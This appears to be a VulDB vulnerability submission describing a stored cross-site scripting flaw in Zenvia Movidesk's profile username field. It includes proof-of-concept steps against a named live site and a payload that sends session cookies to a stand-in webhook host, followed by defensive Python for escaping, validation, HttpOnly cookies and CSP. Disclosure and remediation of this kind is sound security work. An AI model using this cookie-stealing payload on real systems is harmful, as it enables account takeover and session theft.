Submission #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting

Title: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting
Description:

Vulnerability Summary
A stored XSS vulnerability was identified in Zenvia's Movidesk system. The flaw occurs in the username field, allowing the injection of malicious code. When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack.

Vulnerability Details
Vulnerable endpoint (profile editing): https://service.sigmatelecom.com.br/Account/EditProfile
Endpoint where the XSS is triggered (ticket view): https://service.sigmatelecom.com.br/Ticket
Payload used: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>

Impact
- Automatic execution of malicious code upon viewing tickets;
- Theft of session cookies, enabling Account Takeover without user interaction (0-click);
- Compromise of accounts with access to ticket data;
- Privilege escalation if the attacker gains access to administrator credentials.

Recommendations
To mitigate this vulnerability, it is recommended to:
- Input sanitization: implement strict filtering and validation of user inputs in the "Username" field.
- Output escaping: ensure that all displayed data is properly escaped to prevent code execution.
- HttpOnly cookies: configure session cookies with the HttpOnly flag to prevent JavaScript access.
- Content Security Policy (CSP): implement a restrictive CSP to mitigate unauthorized code execution.
- Security audits: conduct regular security testing to identify similar vulnerabilities.

Proof of Concept (PoC)
1. Access the profile editing endpoint: https://service.sigmatelecom.com.br/Account/EditProfile
2. Change the username to the following payload: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>
3. Save the changes.
4. Access the ticket page: https://service.sigmatelecom.com.br/Ticket
5. Observe that the payload is executed and cookies are sent to the webhook.
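The recommendations above (output escaping, input validation, HttpOnly cookies, CSP) are the standard fixes for a stored XSS of this kind. The following Python is an added example written for this page; it is not code from the submitter, from VulDB, or from Zenvia's Movidesk, and it does not reproduce any part of that product. It contrasts a rendering routine that concatenates a stored profile name into the ticket page as-is (the pattern the report describes) with one that escapes at output time, and adds hypothetical helpers for a display-name whitelist and for the cookie and CSP headers the report recommends. The function names, the allowed-character policy and the CSP directives are assumptions, not the product's own settings; the sample input is the payload string quoted in the report.

```python
import html
import re

# Constructed sample: the stored profile name from the report, used here only as
# test input to show that the escaped renderer leaves it inert.
STORED_NAME = '<img src="https://your-webhook.com/?cookie=" + `${document.cookie}`>'

# Hypothetical policy for a display name: letters (incl. accented), digits,
# spaces and a few punctuation marks; 1-64 characters. No angle brackets,
# quotes or backticks, so markup can never be stored in the first place.
_DISPLAY_NAME_RE = re.compile(r"^[\w .'\-]{1,64}$", re.UNICODE)


def render_ticket_row_unsafe(display_name: str, subject: str) -> str:
    # The flaw described in the report: a stored, user-controlled value is
    # concatenated straight into the HTML, so any tag in it becomes live markup.
    return f"<tr><td>{display_name}</td><td>{subject}</td></tr>"


def render_ticket_row_safe(display_name: str, subject: str) -> str:
    # Hardened form: every user-controlled value is HTML-escaped at output time.
    # quote=True also escapes " and ', so the value is safe inside attributes too.
    return (
        f"<tr><td>{html.escape(display_name, quote=True)}</td>"
        f"<td>{html.escape(subject, quote=True)}</td></tr>"
    )


def validate_display_name(name: str) -> bool:
    # Defence in depth at input time: reject names that fall outside the
    # whitelist instead of trying to strip "bad" substrings from them.
    return bool(_DISPLAY_NAME_RE.match(name))


def is_injected(rendered: str, user_value: str) -> bool:
    # Simple check usable in a regression test: if a user value containing '<'
    # appears verbatim in the rendered page, it was not escaped.
    return "<" in user_value and user_value in rendered


def session_cookie_header(session_id: str) -> str:
    # Hypothetical helper building the Set-Cookie header the report asks for:
    # HttpOnly keeps document.cookie from exposing the session id to script.
    return f"Set-Cookie: session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def csp_header() -> str:
    # Hypothetical restrictive policy: resources only from the site itself, so an
    # injected <img> pointing at a third-party host is blocked by the browser.
    return (
        "Content-Security-Policy: default-src 'self'; img-src 'self'; "
        "script-src 'self'; object-src 'none'; base-uri 'self'"
    )


if __name__ == "__main__":
    unsafe = render_ticket_row_unsafe(STORED_NAME, "Printer offline")
    safe = render_ticket_row_safe(STORED_NAME, "Printer offline")
    print("unsafe renderer injected:", is_injected(unsafe, STORED_NAME))
    print("safe renderer injected:  ", is_injected(safe, STORED_NAME))
    print("name accepted by validator:", validate_display_name(STORED_NAME))
    print(session_cookie_header("EXAMPLE-SESSION-ID"))
    print(csp_header())
```

`is_injected` is the kind of assertion worth keeping in a template test suite: it fails the moment someone reintroduces an unescaped interpolation of a profile field. The validator is deliberately a whitelist rather than a blacklist of tags, since escaping at output remains the primary control and the validator only narrows what can be stored.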
Source: https://service.sigmatelecom.com.br/Ticket
User: y4g0 (UID 80480)
Submitted: 21/01/2025 01h15 (1 year ago)
Moderated: 02/02/2025 08h54 (12 days later)
Status: Accepted
VulDB Entry: 294362 [Zenvia Movidesk up to 25.01.22 Profile Editing /Account/EditProfile Username Cross Site Scripting]
Points: 17
